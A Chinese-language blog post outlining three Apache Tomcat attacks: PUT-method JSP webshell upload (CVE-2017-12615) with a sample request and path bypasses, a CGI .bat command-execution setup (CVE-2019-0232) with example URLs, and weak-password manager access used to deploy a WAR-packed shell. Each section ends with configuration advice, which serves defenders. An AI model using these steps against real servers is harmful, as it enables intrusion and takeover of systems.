常见web中间件漏洞（四）Tomcat漏洞

这部分好久没写了，继续更新web中间件漏洞思路整理（不复现） ，争取。。。整理完

前几篇指路链接：

nginx：

https://www.cnblogs.com/lcxblogs/p/13596239.html

Apache：

https://www.cnblogs.com/lcxblogs/p/13588664.html

IIS：

https://www.cnblogs.com/lcxblogs/p/13539558.html

Tomcat 服务器是一个开源的轻量级Web应用服务器，在中小型系统和并发量小的场合下被普遍使用，是开发和调试Servlet、JSP 程序的首选。

安装不介绍了，两种方法都可以，教程参考：https://www.cnblogs.com/dekevin/p/12261904.html、https://www.cnblogs.com/jingmoxukong/p/8258837.html

使用功能参考：https://blog.csdn.net/chaogu94/article/details/107292921

（可通过kill掉进程中的tomcat.exe强制关闭）

1.Tomcat任意文件写入漏洞（CVE-2017-12615）

Apache Tomcat 7.0.0 - 7.0.81受到影响

conf下的web.xml正常来说是这样

但是如果是这样

存在readonly为false，表示允许PUT与DELETE请求，就会造成此漏洞

即：当 Tomcat 运行在 Windows 主机上，且启用了 HTTP PUT 请求方法（例如，将 readonly 初始化参数由默认值设置为 false，如果是true的话，那么PUT和DELETE方法是被拒绝的，因此如果手动将readonly选项开启为false，那么就能够通过PUT请求方法上传文件了），攻击者可通过构造攻击请求向服务器上传 JSP 木马

比较常规的一个利用思路是：访问tomcat主页抓包，先把GET请求方式改成OPTIONS请求方式，看返回包有没有不安全的方法（PUT DELETE。。。）

如果有，搞一波

可以把GET请求改成PUT、添加文件名、加文件内容

注意，如果像下面这种/1.jsp请求是不行的，会因为处理不了而404

PUT /1.jsp HTTP/1.1
Host: 192.168.xxx.xxx:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

马马马马。。。。

必须要进行绕过，可以尝试如下两种方式

/1.jsp/　　

/1.jsp%20

然后访问马或者脚本实现目的

复现过程参考：https://www.freebuf.com/articles/web/258907.html

https://blog.csdn.net/zy15667076526/article/details/109958388

所以不要这么配置

2.Tomcat 远程代码执行（CVE-2019-0232）

影响9.0.0.M1 ~ 9.0.17, 8.5.0 ~ 8.5.39 ， 7.0.0 ~ 7.0.93版本的Windows系统下的tomcat

还是web.xml中

变为

接着在conf/context.xml  中的<Context>添加privileged="true"语句

webapps\ROOT\WEB-INF下创建一个cgi-bin文件夹，并在文件夹内创建一个bat文件写入

@echo off
echo Content-Type: text/plain
echo.
set off=%~1
%off%

只是举个例子，实际上写啥都行，只要可以执行，实现目标

然后访问这个bat文件附加命令可执行某某命令，例如

http://127.0.0.1:8080/cgi-bin/xxxxxx.bat?c:/windows/system32/ipconfig

http://127.0.0.1:8080/cgi-bin/xxxxxx.bat?c:/windows/system32/net+user

复现参考：https://blog.csdn.net/weixin_43806577/article/details/100094722

https://blog.csdn.net/xuandao_ahfengren/article/details/106982504

https://www.jianshu.com/p/3fcd2f3f6ba4

想要利用成功，条件比较苛刻

3.Tomcat + 弱口令 && 后台getshell漏洞

正常来说tomcat-users.xml是这样的

如果允许远程登录，需要修改配置，加一段，参考：https://www.cnblogs.com/wangjiming/p/12492764.html

<tomcat-users>
    <role rolename="manager-gui"/>
    <role rolename="manager-script"/>
    <role rolename="manager-jmx"/>
    <role rolename="manager-status"/>
    <role rolename="admin-gui"/>
    <role rolename="admin-script"/>
    <user username="tomcat" password="tomcat" roles="manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script" />
</tomcat-users>

然后看是否可以通弱口令登录tomcat后台（比如我的用户名密码都是admin），默认路径就是manager/html（我这里改了端口号，不做特殊说明），访问此路径弱口令进入后台

然后发现允许上传WAR文件

Javaweb工程大多打包成WAR包，便于管理且tomcat可以自动识别

所以我们的思路就是把jsp马打包成WAR

以管理员模式运行cmd生成WAR：jar -cvf lcx.war lcx.jsp

然后通过“要部署的WAR文件”把WAR包传上去

WAR自行解压

之后访问马子

所以弱口令不能有（可以通过抓包解码爆破），且需要设置conf/tomcat-users.xml中目录页面的访问限制，或者改掉manage/html

复现参考：https://www.cnblogs.com/bmjoker/p/9892653.html

https://www.cnblogs.com/mke2fs/p/12718669.html

https://my.oschina.net/u/3076320/blog/4345568

未经允许，禁止转载